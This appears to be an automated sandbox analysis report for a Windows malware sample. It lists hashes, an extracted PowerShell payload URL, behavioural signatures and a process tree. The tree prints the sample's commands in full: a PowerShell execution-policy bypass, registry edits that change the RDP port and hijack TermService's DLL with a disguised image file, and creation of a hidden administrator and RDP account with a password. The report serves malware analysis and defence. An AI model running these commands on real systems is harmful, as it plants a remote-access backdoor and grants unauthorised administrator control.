Analysis
-
max time kernel
110s -
max time network
121s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
05-12-2021 07:54
Static task
static1
Behavioral task
behavioral1
Sample
65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe
Resource
win10-en-20211014
General
-
Target
65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe
-
Size
4.6MB
-
MD5
f616975d69da372f403d58ba955dc510
-
SHA1
e22fcb3ec811cba8d74d4f897d495f21e8c88224
-
SHA256
65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874
-
SHA512
2be545ed1a330f76ff21e3f8406b4982b86a432065264fd88008ab762bf2fafb0f892cbee2b395cdd62c6be98ce02868223331bf1f3e9402cde6f366ca8c49e5
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 29 2820 powershell.exe 31 2820 powershell.exe 32 2820 powershell.exe 33 2820 powershell.exe 35 2820 powershell.exe 37 2820 powershell.exe 39 2820 powershell.exe 41 2820 powershell.exe 43 2820 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3192 3192 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BB9.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BCA.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4jaajhxd.wt1.psm1 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6B39.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_v0121kv2.cqu.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6B98.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BA8.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 35 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 520 powershell.exe 520 powershell.exe 520 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 520 powershell.exe 520 powershell.exe 520 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 632 632 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 520 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeIncreaseQuotaPrivilege 1712 powershell.exe Token: SeSecurityPrivilege 1712 powershell.exe Token: SeTakeOwnershipPrivilege 1712 powershell.exe Token: SeLoadDriverPrivilege 1712 powershell.exe Token: SeSystemProfilePrivilege 1712 powershell.exe Token: SeSystemtimePrivilege 1712 powershell.exe Token: SeProfSingleProcessPrivilege 1712 powershell.exe Token: SeIncBasePriorityPrivilege 1712 powershell.exe Token: SeCreatePagefilePrivilege 1712 powershell.exe Token: SeBackupPrivilege 1712 powershell.exe Token: SeRestorePrivilege 1712 powershell.exe Token: SeShutdownPrivilege 1712 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeSystemEnvironmentPrivilege 1712 powershell.exe Token: SeRemoteShutdownPrivilege 1712 powershell.exe Token: SeUndockPrivilege 1712 powershell.exe Token: SeManageVolumePrivilege 1712 powershell.exe Token: 33 1712 powershell.exe Token: 34 1712 powershell.exe Token: 35 1712 powershell.exe Token: 36 1712 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeIncreaseQuotaPrivilege 1964 powershell.exe Token: SeSecurityPrivilege 1964 powershell.exe Token: SeTakeOwnershipPrivilege 1964 powershell.exe Token: SeLoadDriverPrivilege 1964 powershell.exe Token: SeSystemProfilePrivilege 1964 powershell.exe Token: SeSystemtimePrivilege 1964 powershell.exe Token: SeProfSingleProcessPrivilege 1964 powershell.exe Token: SeIncBasePriorityPrivilege 1964 powershell.exe Token: SeCreatePagefilePrivilege 1964 powershell.exe Token: SeBackupPrivilege 1964 powershell.exe Token: SeRestorePrivilege 1964 powershell.exe Token: SeShutdownPrivilege 1964 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeSystemEnvironmentPrivilege 1964 powershell.exe Token: SeRemoteShutdownPrivilege 1964 powershell.exe Token: SeUndockPrivilege 1964 powershell.exe Token: SeManageVolumePrivilege 1964 powershell.exe Token: 33 1964 powershell.exe Token: 34 1964 powershell.exe Token: 35 1964 powershell.exe Token: 36 1964 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeIncreaseQuotaPrivilege 1388 powershell.exe Token: SeSecurityPrivilege 1388 powershell.exe Token: SeTakeOwnershipPrivilege 1388 powershell.exe Token: SeLoadDriverPrivilege 1388 powershell.exe Token: SeSystemProfilePrivilege 1388 powershell.exe Token: SeSystemtimePrivilege 1388 powershell.exe Token: SeProfSingleProcessPrivilege 1388 powershell.exe Token: SeIncBasePriorityPrivilege 1388 powershell.exe Token: SeCreatePagefilePrivilege 1388 powershell.exe Token: SeBackupPrivilege 1388 powershell.exe Token: SeRestorePrivilege 1388 powershell.exe Token: SeShutdownPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeSystemEnvironmentPrivilege 1388 powershell.exe Token: SeRemoteShutdownPrivilege 1388 powershell.exe Token: SeUndockPrivilege 1388 powershell.exe Token: SeManageVolumePrivilege 1388 powershell.exe Token: 33 1388 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4064 wrote to memory of 520 4064 65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe powershell.exe PID 4064 wrote to memory of 520 4064 65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe powershell.exe PID 520 wrote to memory of 2536 520 powershell.exe csc.exe PID 520 wrote to memory of 2536 520 powershell.exe csc.exe PID 2536 wrote to memory of 884 2536 csc.exe cvtres.exe PID 2536 wrote to memory of 884 2536 csc.exe cvtres.exe PID 520 wrote to memory of 1304 520 powershell.exe csc.exe PID 520 wrote to memory of 1304 520 powershell.exe csc.exe PID 1304 wrote to memory of 3640 1304 csc.exe cvtres.exe PID 1304 wrote to memory of 3640 1304 csc.exe cvtres.exe PID 520 wrote to memory of 1712 520 powershell.exe powershell.exe PID 520 wrote to memory of 1712 520 powershell.exe powershell.exe PID 520 wrote to memory of 1964 520 powershell.exe powershell.exe PID 520 wrote to memory of 1964 520 powershell.exe powershell.exe PID 520 wrote to memory of 1388 520 powershell.exe powershell.exe PID 520 wrote to memory of 1388 520 powershell.exe powershell.exe PID 520 wrote to memory of 3464 520 powershell.exe reg.exe PID 520 wrote to memory of 3464 520 powershell.exe reg.exe PID 520 wrote to memory of 3704 520 powershell.exe reg.exe PID 520 wrote to memory of 3704 520 powershell.exe reg.exe PID 520 wrote to memory of 1036 520 powershell.exe reg.exe PID 520 wrote to memory of 1036 520 powershell.exe reg.exe PID 520 wrote to memory of 3180 520 powershell.exe net.exe PID 520 wrote to memory of 3180 520 powershell.exe net.exe PID 3180 wrote to memory of 2820 3180 net.exe net1.exe PID 3180 wrote to memory of 2820 3180 net.exe net1.exe PID 520 wrote to memory of 3812 520 powershell.exe cmd.exe PID 520 wrote to memory of 3812 520 powershell.exe cmd.exe PID 3812 wrote to memory of 3032 3812 cmd.exe cmd.exe PID 3812 wrote to memory of 3032 3812 cmd.exe cmd.exe PID 3032 wrote to memory of 8 3032 cmd.exe net.exe PID 3032 wrote to memory of 8 3032 cmd.exe net.exe PID 8 wrote to memory of 752 8 net.exe net1.exe PID 8 wrote to memory of 752 8 net.exe net1.exe PID 520 wrote to memory of 3172 520 powershell.exe cmd.exe PID 520 wrote to memory of 3172 520 powershell.exe cmd.exe PID 3172 wrote to memory of 3576 3172 cmd.exe cmd.exe PID 3172 wrote to memory of 3576 3172 cmd.exe cmd.exe PID 3576 wrote to memory of 3160 3576 cmd.exe net.exe PID 3576 wrote to memory of 3160 3576 cmd.exe net.exe PID 3160 wrote to memory of 2176 3160 net.exe net1.exe PID 3160 wrote to memory of 2176 3160 net.exe net1.exe PID 500 wrote to memory of 2612 500 cmd.exe net.exe PID 500 wrote to memory of 2612 500 cmd.exe net.exe PID 2612 wrote to memory of 1048 2612 net.exe net1.exe PID 2612 wrote to memory of 1048 2612 net.exe net1.exe PID 3944 wrote to memory of 3988 3944 cmd.exe net.exe PID 3944 wrote to memory of 3988 3944 cmd.exe net.exe PID 3988 wrote to memory of 1456 3988 net.exe net1.exe PID 3988 wrote to memory of 1456 3988 net.exe net1.exe PID 1964 wrote to memory of 2800 1964 cmd.exe net.exe PID 1964 wrote to memory of 2800 1964 cmd.exe net.exe PID 2800 wrote to memory of 3548 2800 net.exe net1.exe PID 2800 wrote to memory of 3548 2800 net.exe net1.exe PID 1308 wrote to memory of 1884 1308 cmd.exe net.exe PID 1308 wrote to memory of 1884 1308 cmd.exe net.exe PID 1884 wrote to memory of 1984 1884 net.exe net1.exe PID 1884 wrote to memory of 1984 1884 net.exe net1.exe PID 2848 wrote to memory of 584 2848 cmd.exe net.exe PID 2848 wrote to memory of 584 2848 cmd.exe net.exe PID 584 wrote to memory of 3456 584 net.exe net1.exe PID 584 wrote to memory of 3456 584 net.exe net1.exe PID 3276 wrote to memory of 3084 3276 cmd.exe net.exe PID 3276 wrote to memory of 3084 3276 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe"C:\Users\Admin\AppData\Local\Temp\65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1123.tmp" "c:\Users\Admin\AppData\Local\Temp\yi2wujv5\CSCAFBD4976229C4F7597F5B97153978B2D.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17BA.tmp" "c:\Users\Admin\AppData\Local\Temp\sn53rhrj\CSCB729DAFD60D64B9A92E2826B327DF462.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc o18EWFWJ /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc o18EWFWJ /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc o18EWFWJ /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc o18EWFWJ1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc o18EWFWJ2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc o18EWFWJ3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
